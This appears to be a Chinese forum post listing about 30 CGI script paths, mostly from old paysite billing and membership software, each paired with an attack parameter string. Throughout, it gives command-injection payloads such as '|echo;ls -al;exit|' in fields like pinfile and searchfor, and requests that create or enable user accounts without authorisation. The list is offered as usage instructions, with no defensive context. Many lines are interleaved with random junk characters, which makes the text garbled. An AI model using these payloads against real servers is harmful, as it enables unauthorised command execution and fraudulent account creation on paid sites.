Cgi-bin 30个漏洞＋使用方法

admin

==============================
  f* x) R  G' {  a! f, w' P
/smspass.pl
username=username&password=password

/index.cgi
wei=ren&gen=command

8 j3 Q3 @; b6 i4 w0 j/passmaster.cgi
Action=Add&Username=Username&Password=Password

/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|

/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|

7 p# U4 ]5 N# }2 k( l  z/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password

/ccbill-local.asp
4 l# x, L2 @4 Ypost_values=username:password

/count.cgi
5 k* M4 n! S3 D* ^* e+ Gpinfile=|echo;ls -la;exit|

/recon.cgi
9 {: O, `: A5 @0 Z/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|

& v6 l, E- B+ g9 q/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>

/af.cgi
_browser_out=|echo;ls -la;exit;|

/modify.cgi
username=username&password=password&expire=30

7 @+ o6 ?% b" y8 c. y3 e/openjournal.cgi
+ Q1 M$ ^+ Q& Z. d9 w0 u4 ^/ N: Xedit=1&ct=2&go=|echo;ls -al;exit|
6 w9 K9 [  G" n& e$ c; C. t
/gx9passwd.cgi
cmd=ADD&user=username&pass=password
/ l: [/ r: j: B) B
& W1 J& i6 Q' |/probecontrol.cgi
: q, `9 X. X4 Ucommand=enable&username=username&password=password
+ Q( G2 I/ w& E4 v/ n
1 s6 y* f% [; o' }4 T% |/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit
% h6 f# S1 h# w9 m4 q6 C/ G
/htadd.pl
configfile=|echo; ls -alt; exit
& X4 `* z& Y- k7 `/ n* A1 g
/gx9passwd.cgi
cmd=ADD&user=username&pass=password

/ibill*.pl
7 H9 y+ f% Z& y9 b2 S4 }reqtype=add&authpwd=authpwd&username=username&password=password

9 D& N  m$ Y4 L4 b/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)

- I2 F4 U. h8 U$ g9 ?5 ]- E, U/globill_ut.cgi
0 c! [; c9 y+ Q3 S5 F6 [7 r, v6 gdo=add&username=username&password=password&wpassword=password

/usercontrol.cgi
9 m! r' b& B) z& r$ Pcommand=enable&username=USER&password=PASS

/ R  \8 s$ i! j# x, x6 m/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

. \0 S+ y. u0 _" v, l  t, H+ a  q/addusr.pl
user=USER&pass=PASS&confirm=PASS
! `4 h8 `1 W. e6 e7 M
1 `) q* e6 d+ e4 W/pincount.cgi
6 w* a2 W: e1 ~- A& v/cgi-bin/mastergate/pincount.cgi
0 N4 V; n  k7 L4 dpinfile=|echo;pwd;exit|

' S6 V, Q4 U# M/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
/ @- t8 B: L6 J' Q
/af.cgi
+ d, s! ~, ^5 d6 |$ e; L/ q" {/env.cgi
! g' y8 `& [9 B5 e2 d: cADD+;echo;pwd;exit
3 s# m; A$ Z- G. L, w
/count.cgi
$ k7 D8 K9 r2 _pinfile=|echo;pwd;exit|

5 t- m, P$ u" d9 I/ M* W+ Y/recon.cgi
7 I9 `7 n8 D4 J5 C7 y3 n% jsearchoption=1&searchfor=|echo;ls%20-al;exit|
, D& s$ p: q# W/ X" p" I
" L8 G/ B. n7 [  }5 X/add.cgi
username=username&password=password&expire=30

==============================
7 Z! _* T5 c2 h# \